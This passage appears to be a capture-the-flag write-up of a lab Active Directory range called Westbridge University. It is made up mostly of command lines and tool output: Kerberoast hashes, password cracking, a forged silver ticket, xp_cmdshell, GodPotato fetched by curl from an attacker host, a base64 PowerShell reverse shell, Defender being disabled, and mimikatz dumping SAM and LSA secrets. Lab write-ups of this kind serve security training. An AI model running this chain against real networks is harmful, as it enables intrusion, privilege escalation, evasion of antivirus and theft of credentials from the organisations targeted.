$krb5tgs$18$svc_krb_t2$WESTBRIDGE.HSM$*svc_krb_t2*$309a13afbe6cb7e0ed5b1e8c$5364eeb98860694541cb777fac2313317f5ca9df1d796a894d0aaed79275944e3df910d4f0be090f52e54779f5d97ecaf1ece2eaef2be5617439aface19d068298be718fc2378a87dd5725896eea4af6b117fb195483f36812a888d8e9f270ffca61504b91608a721e712bbb700a55deca93bacdf06b50ca1a8ffe85a6d3cdcfaf280e30fe9e77f1b401ef3bae4eb8a36b35df2053fad4ad31a9cd5ae25e52d9a62c96eb870b34a7bde9b3c2919a7803fb3a825e11963c8ea600d72ff91b412c6e3f4b5f5f39c94d46684153b38994d64979d85f1db6ee2e50a54244101f20fba253c7fd20f3a88368607c20ebe34321087e774f17a0db31c0a0042f24e6d31c6d96461cde2c123fe2b62b5bc66b6c13ccb1fd4c417a57590c9fcfe22f6f6758f2d70bd775bd060da5f1ced1acc988e8ab14027847e75c98651b9a6737bad2c93df0462f459a297e58621e5007a571d573a9a39bd5b2d8bc9664ad5615b63ac5d51e1a38799e520df446640ded2cef6b761f7eb9fc6d96172fedb3370c8610a5f84fabbf3119e202c9d37e5aba2428400caf7240b94819aa915c75e3aa2c3bf163d72322fe9cbb8161b9afc8e8f9d84ea67a6e09ba6f8246cbff006e70b894c4249af66037f5bce0e60f2e9a3b179b1fc9d463f6e4adc5aebc791de6ad1fd309e22a56f3778f054d40ef483b13f5415f303845e76d34ed98c94d4fd97db71f31e5957f49223dcf322e1080ebbdd03eefe0ae67b1e173635618605df8c1e7717414a6ede89ff9e266df97811d57a6388a9b54952fdc6edd58e6d2b94ae1c8d0d7e7dc7e5cac90479aace6125d787448d6edfc9cee1aa16786a214d153ade8f6b1a0aebc0c13dbac4a0e166c54946ad7daaff88b7711810f1945d2795aa3da8ee4ba751bdd655f8a65fa28da028a617055a6b29ad8ac6fac4d69f5d6b5f198ec86f5be4f6b8561a7806be477d409acf8ebc25e6aa47e6bed7b82047499bf960bc3897adc9de7308c5c9ffc1999c3876b26a749cc505d44b2506e4e50d474d54c79524c95ffee061233fc5d45c76df03459aba46f1da4226a77c678722cdc7fa8c7af0ad833eed5a4df26270df05756d90520b365c7886ab99a37d2b063809175628a2becb00b169b4279ab31dda88c0ca03958941e560a4919eb203bc76a333840da59f2d824014f8b23d30cda2dd40162cd0045d1c0e1d4c6379f254ab871d9ec56348ed0e13c7ba7de7ba05c29e4d57233d0552364ebd750338d81821e21b009bf0f23d3e0cc88e7be845cf316fc68bed26cea8e1383723fd99d1f157334d68a50410a4e26b513927659e2da97a1a8a0fb3d1f0b49e9dabe5fc13fdf621cbcc5d9c54797be0752a9fbcc41dbaaa2d564d7884a523f6200dbe697371e980026f69de02f3ceadaa09405c6a678acba1acdb8236a1dc7e357e28e31f37985a4c976443d2eff9a592a57f377eac4901d1e050ef9461a74e3a32076186bc04335c713382f9d031ae4dbcf8d97ee9842b34951f4135353a95150c7c2c1080f9fb8b3562fc8cad6fd2d40ac053bca6933afea5035
$krb5tgs$23$*svc_mssql$WESTBRIDGE.HSM$svc_mssql*$cc0c89ec16f3b4ddf579f2363c92302f$bc2d0ac7a02ed0abdb69741be638afabf6a4f97bc58f12926d283e644453c038d87ecb8f08fe899d4e0b37c16381e7842fbf529d4d08a01a1cbd8e186383e63e40082fcbaf58a86de757f61f79a4344dd8913dfc4d8d0782f4daa3459d719d35654c4904eb15116d8750565c7677661382e5392ad43877a26e01eea571a9b00963af709fe7b002667d202eab5a4422a2c879ad0cdf547b7ae048641f45b1c5a3275ae2bf61ea96afe19a8383aef347bc1124ac6129f1ee90125f5e6e363694cc90ea625485be5ed9403f3af4c573a8c10f3a3eb8e42ee09dfc1a338a1a30b856b3a7a9e4f12d5c5e1d362fec822a95ec040fde501101418cb34e63b6c8000077ff92337b185007bb6ed621e57407ce4ca86d72e81234b9b9a67c03baf73ce6943c518b00d655dd891ae56c4dc0479c3787afa24fb29f031183542ea3345e340c9ff5cca3c08bde27654c7a3fcb97815306d384e04d851072bf949f5760187d83e895b117e5234919217730082afe924ddf8498410cd227fb8543618b3992853820ba4f7e45aa426733959fa32535d510c24e8cc02697865feb7a7e846d6794fddb93b050d0cce99390336ce31eb5bd66c90830ebea395e1ba2905c6a77c8a0152af785a977ffebf8175919ca4ea925cf12085489ed7ed6f025468b5ce2e27fe4b2bed9f1959495d93e07ed42aca3942f6e268ac9ba11106c09b0f7f77fc7328abecef2eec909e126f63760708f92dd6b731258dd146da76ea713dd6ccab13f4309ac8b84245d23e2e233888c7086382f6acf8561fc2baa160cd31328379fb9b62f1c86ea92a609b7ad596ef74e07bad045b1ff4b647d7e938e3be224e089dbeeb83009bacb0a4f7ebe71bd6446ddbecb25a732af774cb15a141882c2c584f1c6c538d08ab0939bd57b09f4b0e23ec18ae5134035f8207d9821f1c928cb6d3a34fccf973d6fd12e14a584058e89f211daa7166943d5f0c0186e90e261591b81241725937ebe3fadff7e6728431085276b4d2bf6d2344ebbbae9be505e675dbb33f161ce78fa6739c192d641834794371a15eb75771e5197d96947f75baf5c09299790f8c1b1f4dc9d5eda7881633502a472432cc29279cd8ee4816866393f15b9ee16b9295b3692c99a8328d209ba51163340e842fb8f1b6c41577f901c9486570f287aafb65a829413dd82a64a84118142b70458f642ddd77789a80b3b46569de6f90dd09360f7f315e1095de1e1f0f607bcb7c2c77e94a6d378a05eb97bb896b632393c7187d14dff39de7b73893f47d4d8e0968bf3daa907301721d1dbae491fc9cd0e60aabfe462ebb2376d581a8fc0a34470e762ce24134f9a8ce51ed73f25a79b2922bbb85ae6965a5863f14709627e3a0a59add4fcbe51dc6e3077b1d0a42976ed29c27c02f1dae430939c93342cdcbc3380d917a5ecebdb47726ca83399619712a37c3a03a51cb46e4e3c3a6632fa3873e1f5571a8d0ed4870924ba7f0c0dd043d0b7639ce708b05d7f69069d61550d40ab0295f39ec2af0b8ea861150c

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

svc_mssql came back with an RC4 (etype 23) ticket, which fell instantly:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ john kerberoast_output.txt -w=rockyou_costum.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sqls3rv3r (?)
1g 0:00:00:00 DONE (2026-08-24 10:28) 100.0g/s 500500p/s 500500c/s 500500C/s taniafaye..sexcluff
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

BloodHound confirms exactly these two primitives:

1
2
3
4
5
AS-REP roastable (dontreqpreauth): [ SVC_LEGACY@WESTBRIDGE.HSM ]
Kerberoastable (hasspn):
SVC_MSSQL → MSSQLSvc/SQL.westbridge.hsm:1433
SVC_FILES → cifs/FILES.westbridge.hsm
SVC_KRB_T2 → svc_krb_t2/WESTBRIDGE.HSM

The technique in one picture:


Phase 3 - SQL: a silver ticket for a group you don’t belong to

impacket-lookupsid (as svc_mssql) dumps the full RID map, exposing custom groups that clearly gate machine admin:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-lookupsid westbridge.hsm/svc_mssql:sqls3rv3r@10.0.10.5 10700
[*] Domain SID is: S-1-5-21-1978613116-3728955385-531918137
9459: WESTBRIDGE\svc_mssql (SidTypeUser)
9460: WESTBRIDGE\SQL$ (SidTypeUser)
9492: WESTBRIDGE\File Server Support (SidTypeGroup)
9497: WESTBRIDGE\MSSQL Maintenance (SidTypeGroup)
9505: WESTBRIDGE\WEB Backup Maintainers (SidTypeGroup)
9517: WESTBRIDGE\CA-Manager (SidTypeGroup)
10611: WESTBRIDGE\HelpDesk Workstation Admins (SidTypeGroup)

Here’s the clever part, and BloodHound proves it: the MSSQL Maintenance group (RID 9497) has sysadmin on the SQL box, but svc_mssql is not a member (its members are j.walsh and m.thompson). So we can’t just log in - we forge a silver ticket that claims that group membership in the PAC:

1
2
3
4
5
6
7
8
9
10
11
# NT hash = NTLM of "sqls3rv3r"; groups 9497 (MSSQL Maintenance) + 512 (Domain Admins) baked into the PAC
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-ticketer -nthash 025d7fd412286be6ff0ba432685d6d8f -domain-sid S-1-5-21-1978613116-3728955385-531918137 -domain westbridge.hsm -spn MSSQLSvc/SQL.westbridge.hsm:1433 -user-id 9459 -groups 9497,512 svc_mssql
[*] Saving ticket in svc_mssql.ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=./svc_mssql.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-mssqlclient -k westbridge.hsm/svc_mssql@SQL.westbridge.hsm -no-pass -target-ip 10.0.10.20
[*] ACK: Result: 1 - Microsoft SQL Server 2019
SQL (WESTBRIDGE\svc_mssql dbo@master)>

Inside MSSQL as sysadmin: enable xp_cmdshell, and because the service token holds SeImpersonatePrivilege, GodPotato takes us to SYSTEM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME=./svc_mssql.ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-mssqlclient -k westbridge.hsm/svc_mssql@SQL.westbridge.hsm -no-pass -target-ip 10.0.10.20 -dc-ip 10.0.10.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (WESTBRIDGE\svc_mssql dbo@master)> enable_xp_cmdshell
INFO(SQL): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(SQL): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell whoami
output
--------------------
westbridge\svc_mssql
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell dir C:\Users\ /b
output
-------------
Administrator
Public
svc_mssql
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)>
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell curl -o C:\Temp\gp.exe http://192.168.211.2:8081/gp.exe
output
--------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 57344 100 57344 0 0 49381 0 0:00:01 0:00:01 --:--:-- 49434
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)>
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell C:\Temp\gp.exe -cmd "whoami"
output
--------------------------------------------------------------------------------
[*] CombaseModule: 0x140719950331904
[*] DispatchTable: 0x140719953065552
[*] UseProtseqFunction: 0x140719952037536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\92a06b0c-b780-4f70-abd4-dde71831dfdb\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00007002-02c8-ffff-1d06-a64e1a81bbc4
[*] DCOM obj OXID: 0x47c4f3ae7aa6d79d
[*] DCOM obj OID: 0xc7680b2bff424341
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 324 Token:0x740 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 656
nt authority\system
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)>

SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell C:\Temp\gp.exe -cmd "cmd /c dir C:\Users\Administrator\Desktop"
output
--------------------------------------------------------------------------------
[*] CombaseModule: 0x140719950331904
[*] DispatchTable: 0x140719953065552
[*] UseProtseqFunction: 0x140719952037536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ebdad9df-93b2-4df6-8c9c-1d3b5e80cb61\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002802-03a4-ffff-c12f-7defec7b7d8a
[*] DCOM obj OXID: 0xb9f85243c1a65333
[*] DCOM obj OID: 0xf9bad56be9d46f99
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 324 Token:0x740 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3948
Volume in drive C is Windows
Volume Serial Number is 7EC2-1A39
NULL
Directory of C:\Users\Administrator\Desktop
NULL
07/03/2026 07:12 PM <DIR> .
07/03/2026 02:14 PM <DIR> ..
07/28/2026 03:25 PM 53 flag.txt
1 File(s) 53 bytes
2 Dir(s) 72,892,309,504 bytes free
NULL
SQL (WESTBRIDGE\svc_mssql dbo@master)> xp_cmdshell C:\Temp\gp.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\flag.txt"
output
--------------------------------------------------------------------------------
[*] CombaseModule: 0x140719950331904
[*] DispatchTable: 0x140719953065552
[*] UseProtseqFunction: 0x140719952037536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\744800d2-2b1e-4b3f-b259-989da58d293f\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003c02-0bd8-ffff-dc97-9988202a5b0b
[*] DCOM obj OXID: 0x68d0cda675cb12e2
[*] DCOM obj OID: 0x155059a820171e9e
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 324 Token:0x740 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4700
Flag01{SILVER_*****}
NULL

NULL

SQL (WESTBRIDGE\svc_mssql dbo@master)>

NULL

Used Powershell #3 reverse shell payload from revshell.com

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SQL (WESTBRIDGE\svc_mssql  dbo@master)> xp_cmdshell C:\Temp\gp.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMQAxAC4AMgAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.211.2] from (UNKNOWN) [10.0.10.20] 49996

PS C:\Windows\System32> whoami
nt authority\system
PS C:\Windows\System32>
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.211.2] from (UNKNOWN) [10.0.10.20] 49999

PS C:\Windows\System32> Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Dumped Bloodhound data using svc_mssql account

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodhound-python -u svc_mssql -p 'sqls3rv3r' -d westbridge.hsm -dc DC.westbridge.hsm -ns 10.0.10.5 -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: westbridge.hsm
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: 18
INFO: Connecting to LDAP server: DC.westbridge.hsm
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to GC LDAP server: dc.westbridge.hsm
INFO: Connecting to LDAP server: DC.westbridge.hsm
INFO: Found 39 users
INFO: Found 71 groups
INFO: Found 2 gpos
INFO: Found 7 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: HELPDESK-WS.westbridge.hsm
INFO: Querying computer: WEB
INFO: Querying computer: FILES.westbridge.hsm
INFO: Querying computer: SQL.westbridge.hsm
INFO: Querying computer: DC.westbridge.hsm
INFO: Done in 00M 57S
INFO: Compressing output into 20260824111128_bloodhound.zip
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
1
Flag01{SILVER_*****}

Loot: the MSSQL backup → m.thompson

A GodPotato reverse shell → dump SAM/LSA (Mimikatz), then pull Westbridge.bak from the MSSQL server’s backup directory and grep it for stored NT hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
PS C:\Windows\System32> cd C:\Temp
PS C:\Temp> curl http://192.168.211.2:8081/mimikatz.exe -o mimikatz.exe
PS C:\Temp> C:\Temp\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

668 {0;000003e7} 1 D 22887 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 22929943 NT AUTHORITY\SYSTEM S-1-5-18 (16g,28p) Primary
* Thread Token : {0;000003e7} 1 D 22955921 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)

mimikatz(commandline) # lsadump::sam
Domain : SQL
SysKey : dcb4ae7d68daa0e68346ffc5931813a4
Local SID : S-1-5-21-1125571547-1798134610-920220621

SAMKey : 05a68d7dba830ca49a6f514813582329

RID : 000001f4 (500)
User : Administrator
Hash NTLM: f88f1cbaa0e3646366885d4b5168c31f

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 94832725538cffe7b637a3f811f89f4c

* Packages *
NTLM-Strong-NTOWF

* Primary:Kerberos-Newer-Keys *
Default Salt : SQL.WESTBRIDGE.HSMAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : b3e1ce71d21aafe59e386a07fdd740c38927b7488efab99a67c8c6bd7528ea32
unknow (4096) : f50b948e44b6219bcdff3488833ab008
aes256_hmac (4096) : b31bcbbac802972aebc1df1aa20dc55c0a8428fb9975e7adfe4164d3d6f10754
aes128_hmac (4096) : 447122efc2c52e46298f5a241f3d57b7
rc4_hmac_nt (4096) : f88f1cbaa0e3646366885d4b5168c31f
ServiceCredentials
des_cbc_md5_nt (4096) : b3e1ce71d21aafe59e386a07fdd740c38927b7488efab99a67c8c6bd7528ea32
unknow (4096) : f50b948e44b6219bcdff3488833ab008
aes256_hmac (4096) : b31bcbbac802972aebc1df1aa20dc55c0a8428fb9975e7adfe4164d3d6f10754
aes128_hmac (4096) : 447122efc2c52e46298f5a241f3d57b7
OldCredentials
des_cbc_md5_nt (4096) : 918f43b7a1da78807f66b0310ed2296d68e3d293cb80a2661dd16b6095ae0d12
unknow (4096) : ff1dc80e42064a6d1aa888e20e41b9f3
aes256_hmac (4096) : 74754bc034bc674210b988001d602dfc2ac3a683ed00b4d28bf0bb8d9f3170a6
aes128_hmac (4096) : ee3e559c41a445e94114b2ce615b959e
rc4_hmac_nt (4096) : d5cad8a9782b2879bf316f56936f1e36
OlderCredentials
des_cbc_md5_nt (4096) : 934d65f4a9c354f4b12e1917088dd0d4b3e774925c8a9991ad4e2c0c4bd10905
unknow (4096) : 7b1d8b00a231d81aae6349172afabdcf
aes256_hmac (4096) : 8e5142e7dfc8f469c707f3e947bf93584c0781b1e33db651e372e2595b5bc3bb
aes128_hmac (4096) : 0580560f2ad1e8636cfa826d3c9f7c60
rc4_hmac_nt (4096) : 86c785f3c949e7987b6ae1e25df20fec


RID : 000001f5 (501)
User : Guest

RID : 000001f7 (503)
User : DefaultAccount

RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 7490f2a63d713a813eda5bf8fd1a8227

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 9023c9ef2b53cd562000290316ef2728

* Packages *
NTLM-Strong-NTOWF

* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 16a6a03ee1b005e632137e804ae09ff9cb18b5f6e2acc248e888755029f5cc7a
aes128_hmac (4096) : 34f5158783edd2d9e92105c7fbcb10ed
rc4_hmac_nt (4096) : 7490f2a63d713a813eda5bf8fd1a8227
ServiceCredentials
aes256_hmac (4096) : 16a6a03ee1b005e632137e804ae09ff9cb18b5f6e2acc248e888755029f5cc7a
aes128_hmac (4096) : 34f5158783edd2d9e92105c7fbcb10ed


mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

mimikatz(commandline) # exit
Bye!
PS C:\Temp>

PS C:\Temp> C:\Temp\mimikatz.exe "privilege::debug" "lsadump::secrets" "lsadump::cache" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::secrets
Domain : SQL
SysKey : dcb4ae7d68daa0e68346ffc5931813a4

Local name : SQL ( S-1-5-21-1125571547-1798134610-920220621 )
Domain name : WESTBRIDGE ( S-1-5-21-1978613116-3728955385-531918137 )
Domain FQDN : westbridge.hsm

Policy subsystem is : 1.20
LSA Key(s) : 1, default {5b8d7e87-90ef-5a67-e787-4124c7f338e6}
[00] {5b8d7e87-90ef-5a67-e787-4124c7f338e6} bcbdac6eb638607d18ccd016a14a7f4aa2855d70ea1c3247678862906e0d7b26

Secret : $MACHINE.ACC
cur/hex : d5 bb 5b dc b9 5a a3 58 51 96 d3 27 a7 8d 9d f2 00 ae 40 16 b9 9d f4 6d 58 eb 37 48 d3 71 aa d9 60 96 91 b4 12 f5 ff 33 89 70 7b ae 39 5c 08 59 62 f5 97 bb eb 0b bd 49 bb 61 4e 3d d1 cb 40 0b 65 5a 0e dc b4 9e 78 ad 5b e4 2e ab 54 4e 1d cc 83 a9 dd 95 0e 4d 98 ec 2e 56 5c 79 11 8b ba c9 95 ca 00 54 7e 9c 7f ac 2b 41 04 e6 1e 4f 7b be bd a5 01 3e b5 53 03 58 a0 52 18 3f 71 28 a7 77 94 df d1 3d 52 62 3e a2 4f 78 de 76 b9 86 f4 84 4a 0c c3 96 24 6a 66 5f d6 f8 3c 27 af 1b 7b e9 e2 75 e1 d4 e6 e4 5f 6d 85 d7 b8 60 3d 5c f6 7b b1 fd 50 b1 54 11 9d 2d 88 5e b0 65 66 22 9c 90 80 fe 16 bc 6a c7 8d f5 45 b8 5c de 1d f4 6b 31 5f 18 e3 3c d1 87 28 31 b9 ce 38 b7 14 4c b3 8a b8 fb e5 64 6d ec a4 a9 87 9f a6 2b 92 be 04 70
NTLM:f39f4ffb344e31bd81a93854f655f63f
SHA1:e48972057fb0f63914ba2d7d5ef6d1b3631ad778
